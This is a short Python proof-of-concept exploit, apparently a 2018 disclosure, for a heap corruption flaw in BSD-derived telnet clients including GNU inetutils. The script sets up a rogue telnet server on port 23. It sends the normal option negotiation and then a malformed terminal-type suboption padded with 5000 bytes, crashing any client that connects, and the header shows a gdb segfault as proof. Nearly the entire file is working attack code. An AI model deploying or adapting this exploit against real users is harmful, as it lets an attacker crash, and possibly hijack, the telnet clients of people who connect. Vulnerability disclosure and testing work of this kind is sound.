#!/usr/bin/env python
# Multiple vendor BSD telnet.c remote PoC
# =======================================
# Proof-of-concept exploit to demonstrate remotely 
# accessible environment variable handling issues
# in telnet.c client provided by GNU/inetutils. This
# PoC can also crash additional BSD based telnet 
# clients due to a deeply rooted common code-base 
# shared across BSD telnet clients. 
#
# Starting program: /usr/bin/telnet 127.0.0.1 2323
# Trying 127.0.0.1...
# Connected to 127.0.0.1.
# Escape character is '^]'.
# 
# Program received signal SIGSEGV, Segmentation fault.
# 0x0000555555561172 in ?? ()
# (gdb) i r
#
# -- Hacker Fantastic
# 12/12/2018 
# https://hacker.house

import sys
import socket

# telnet initial negotiation
buffer = b'\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23\xff\xfd\x27' 

# Send malformed and oversized IAC telnet options
buffer2 =b'\xff\xfa\x18\x01'  # set term environment
buffer2 +=b'A'*5000
buffer2 +=b'\xff\xf0'         # end option

HOST = '0.0.0.0'
PORT = 23

if __name__ == "__main__":
    print("[+] Multiple vendor telnet.c client environment handling PoC (IAC SB TELQUAL_IS)")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((HOST, PORT))
        s.listen()
        conn, addr = s.accept()
        print("[-] connected, corrupting client heap")
        while conn:
            try:
                conn.sendall(buffer)
                conn.sendall(buffer2)
            except:
                print("[-] done. merry haxmas.")
                conn.close()
                exit()